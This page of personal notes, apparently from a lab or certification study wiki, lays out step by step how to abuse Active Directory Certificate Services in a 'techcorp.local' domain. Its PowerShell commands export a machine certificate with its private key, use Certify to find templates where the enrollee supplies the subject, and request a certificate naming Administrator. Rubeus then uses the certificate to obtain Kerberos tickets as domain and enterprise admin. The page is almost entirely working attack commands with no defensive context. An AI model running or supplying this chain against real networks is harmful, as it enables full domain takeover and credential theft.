certificate services

Get cert from computer:

PS> ls cert:\LocalMachine\My
PS> ls cert:\LocalMachine\My\BAD78F43BB4CB13C4843E49B51AA051530FFBBDB | Export-PfxCertificate -FilePath C:\Users\Public\pawadmin.pfx -Password (ConvertTo-SecureString -String 'SecretPass@123' -Force -AsPlainText)

Enumerate ADCS (don’t use invishell):

# search for an entry with ENROLLEE_SUPPLIES_SUBJECT and a user that can do this
PS> C:\AD\Tools\Certify.exe cas
PS> C:\AD\Tools\Certify.exe find
PS> C:\AD\Tools\Certify.exe find /enrolleeSuppliesSubject
 
# now use the extracted key
PS> C:\AD\Tools\Rubeus.exe asktgt /user:pawadmin /certificate:C:\AD\Tools\pawadmin.pfx /password:SecretPass@123 /nowrap /ptt
 
PS> C:\AD\Tools\Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
 
# you need to convert the certificate though
PS> C:\AD\Tools\openssl\openssl.exe pkcs12 -in C:\AD\Tools\cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out C:\AD\Tools\DA.pfx
 
# use it to become admin
PS> C:\AD\Tools\Rubeus.exe asktgt /user:Administrator /certificate:C:\AD\Tools\DA.pfx /password:SecretPass@123 /nowrap /ptt
 
# use it to become enterprise admin
PS> C:\AD\Tools\Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:SecretPass@123 /nowrap /ptt

🪴 Quartz 4.0

Explorer

certificate services

certificate services

Graph View

Backlinks